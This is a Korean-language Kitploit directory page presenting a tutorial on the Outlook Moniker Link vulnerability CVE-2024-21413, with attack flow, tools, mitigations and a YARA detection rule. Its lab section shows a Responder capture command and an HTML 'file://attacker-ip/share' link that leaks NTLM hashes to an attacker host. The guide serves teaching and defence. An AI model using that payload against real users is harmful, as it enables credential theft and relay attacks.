Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/bhatbhupendra/moniker-link--cve-2024-21413-
Password CrackingPhishing ToolsVulnerability AnalysisExploitationIDS/IPS EvasionLateral MovementPenetration TestingLearning & EducationRed TeamingEmail Security
GitHubbhatbhupendra/moniker-link--cve-2024-21413-

Moniker-Link--CVE-2024-21413-

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔗 Moniker Link (CVE-2024-21413) — Outlook 제로 클릭 취약점에 대한 실전 가이드


📌 1. 소개

CVE-2024-21413은 흔히 Moniker Link 취약점이라고 불리며, 사용자 상호작용 없이 공격자가 사용자 자격 증명을 유출할 수 있게 하는 Microsoft Outlook의 치명적인 보안 결함입니다.

전통적인 피싱 공격과 달리 이 취약점은 이메일을 미리 보는 것만으로 트리거될 수 있어 기업 환경에서 특히 위험합니다.

이 문제는 Outlook이 moniker 링크를 처리하는 방식에서 비롯되며, 공격자가 제어하는 시스템에 대한 의도하지 않은 인증 시도를 유발합니다.


🧠 2. 핵심 개념

다음 개념을 이해하는 것이 필수적입니다:

🔹 Moniker Link

Windows 전용 메커니즘으로, 애플리케이션이 다음과 같은 프로토콜을 사용해 외부 리소스를 참조할 수 있게 합니다:

  • file://
  • unc://

🔹 NTLM 인증

  • 레거시 Windows 인증 프로토콜
  • 원격 리소스에 접근할 때 해시된 자격 증명을 자동으로 전송
  • 자격 증명 캡처 및 릴레이 공격에 취약

🔹 UNC 경로(Universal Naming Convention)

root@kitploit:~
\\attacker-server\share

네트워크를 통해 공유 리소스에 접근하는 데 사용됩니다. 이 취약점에서는 인증 요청을 강제하는 데 악용됩니다.

🔹 보호된 보기(Protected View) 우회

Outlook의 보호된 보기(Protected View) 는 잠재적으로 안전하지 않은 콘텐츠를 격리하도록 설계되었습니다. 이 취약점은 해당 보호를 우회하여 외부 리소스 접근을 허용합니다.


⚙️ 3. 작동 방식

공격 흐름(단계별)

  1. 페이로드 제작

    • 공격자는 이메일 내에 악성 moniker 링크(예: file://attacker-server/share)를 삽입합니다.
  2. 전달

    • 이메일이 피해자에게 전송됩니다.
  3. 트리거

    • 피해자가 Outlook에서 이메일을 미리 보거나 엽니다.
  4. 자동 처리

    • Outlook이 사용자 상호작용 없이 링크를 처리합니다.
  5. 인증 요청

    • Windows가 공격자의 서버에 NTLM 인증을 시도합니다.
  6. 자격 증명 노출

    • 공격자가 NTLM 해시를 캡처합니다.

공격 흐름 다이어그램

root@kitploit:~
[Attacker]
    |
    | 1. Send crafted email
    v
[Victim Outlook]
    |
    | 2. Auto-process moniker link
    v
[Windows System]
    |
    | 3. NTLM authentication attempt
    v
[Attacker Server]
    |
    | 4. Capture NTLM hash
    v
[Credential Abuse / Lateral Movement]

🌍 4. 실제 영향

일반적인 공격 시나리오

  • 조직을 대상으로 한 표적 피싱 캠페인
  • 기업 네트워크에서의 자격 증명 수집
  • 횡적 이동을 위한 초기 접근

공격자의 목표

  • NTLM 해시 캡처
  • 내부 서비스에 대한 인증 릴레이
  • 네트워크 내 권한 상승

🛠️ 5. 도구 및 기술

공격/연구 도구

  • Responder — NTLM 인증 해시 캡처
  • Impacket — 네트워크 공격 툴킷
  • ntlmrelayx.py — NTLM 릴레이 공격 수행

방어 도구

  • Microsoft Defender — 엔드포인트 탐지 및 대응
  • Wireshark — 네트워크 트래픽 검사
  • Sysmon — 고급 시스템 이벤트 로깅

💻 6. 실습 예제(실험실 환경 전용)

⚠️ 통제된 실험실 환경에서만 수행하세요

NTLM 캡처 서비스 시작

root@kitploit:~
sudo responder -I eth0

악성 링크 예시

root@kitploit:~
<a href="file://attacker-ip/share">Open Document</a>

예상 출력

root@kitploit:~
[SMB] NTLMv2 Hash captured
User: victim

🛡️ 7. 탐지(YARA 규칙)

Florian Roth가 moniker 링크를 이용한 공격 시도를 식별하기 위한 탐지 규칙을 개발했습니다.

YARA 규칙 예시

root@kitploit:~
rule Outlook_MonikerLink_CVE_2024_21413
{
    meta:
        description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
        author = "Florian Roth"
        reference = "CVE-2024-21413"
    
    strings:
        $a = "file://"
        $b = "\\\\"
    
    condition:
        any of them
}

탐지 사용 사례

  • 이메일 게이트웨이 스캐닝
  • SIEM 알림 생성
  • 의심스러운 링크에 대한 위협 헌팅

🛡️ 8. 완화 및 모범 사례

패치 관리

  • Microsoft가 제공하는 보안 업데이트를 즉시 적용

인증 강화

  • 가능한 경우 NTLM 비활성화
  • Kerberos 인증 강제

네트워크 제어

  • 외부 네트워크로 나가는 SMB(TCP 445) 차단
  • 불필요한 외부 연결 제한

이메일 보안

  • file:// 및 UNC 기반 링크 필터링 또는 삭제
  • 고급 이메일 위협 보호 솔루션 사용

모니터링 및 탐지

  • 외부로 나가는 인증 시도 모니터링
  • 비정상적인 SMB 트래픽 로깅 및 알림

⚠️ 9. 흔한 실수

  • 사용자 상호작용이 필요하다고 가정하는 것
  • 현대 환경에서 NTLM 관련 위험을 무시하는 것
  • 네트워크 제어 없이 바이러스 백신에만 의존하는 것
  • 패치 배포를 지연하는 것

🧾 10. 결론

CVE-2024-21413은 자동 인증과 같은 시스템 동작이 이메일 링크처럼 겉보기에 무해한 입력을 통해 어떻게 악용될 수 있는지 보여줍니다.

핵심 요점

  • 제로 클릭 취약점 — 사용자 상호작용 불필요
  • Outlook의 moniker 링크 처리 방식을 악용
  • NTLM 자격 증명 유출 초래
  • YARA 및 네트워크 모니터링을 통해 탐지 가능
  • 패치 및 적절한 구성을 통해 예방 가능

📚 11. 추가 자료

  • Microsoft 보안 권고 — CVE-2024-21413
  • Impacket 문서(NTLM 릴레이 공격)
  • YARA 문서
  • OWASP 인증 치트 시트

💡 권장사항: 가상 실습 환경(예: Windows VM + 공격자 VM)에서 이 취약점을 재현하여 공격 체인과 방어 전략을 완전히 이해하세요.

도구 다운로드